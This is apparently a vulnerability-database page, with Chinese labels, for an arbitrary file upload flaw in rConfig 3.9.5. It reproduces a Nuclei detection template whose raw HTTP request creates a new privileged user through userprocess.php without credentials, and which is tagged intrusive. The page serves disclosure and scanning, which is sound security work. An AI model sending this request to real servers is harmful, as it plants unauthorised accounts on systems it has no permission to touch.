rconfig-file-upload: rConfig 3.9.5 - Arbitrary File Upload

日期: 2025-08-01 | 影响软件: rConfig | POC: 已公开

漏洞描述

rConfig 3.9.5 is susceptible to an arbitrary file upload via the userprocess.php endpoint. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.

PoC代码[已公开]

id: rconfig-file-upload

info:
  name: rConfig 3.9.5 - Arbitrary File Upload
  author: dwisiswant0
  severity: high
  description: |
    rConfig 3.9.5 is susceptible to an arbitrary file upload via the userprocess.php endpoint. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  reference:
    - https://www.rconfig.com/downloads/rconfig-3.9.5.zip
    - https://www.exploit-db.com/exploits/48878
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cwe-id: CWE-434
    cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"rConfig"
    product: rconfig
    vendor: rconfig
  tags: rconfig,rce,edb,file-upload,instrusive,intrusive,vuln

http:
  - raw:
      - |
        POST /lib/crud/userprocess.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb
        Cookie: PHPSESSID={{randstr}}

        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="username"

        {{randstr}}
        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="passconf"

        Testing1@
        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="password"

        Testing1@
        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="email"

        test@{{randstr}}.tld
        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="editid"


        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="add"

        add
        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="ulevelid"

        9
        --01b28e152ee044338224bf647275f8eb--

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "User {{randstr}} successfully added to Database"
        part: body

      - type: status
        status:
          - 302
# digest: 4b0a00483046022100be21844f3b2ca9e15ad00771d6cb7c399d5792bdbbf5be851b09d212095fcf44022100edb7b8eebded73f8a6696c192152c7bb5ea6be1b15219f7f71fa00745c30676c:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/other/rconfig-file-upload.yaml

相关漏洞推荐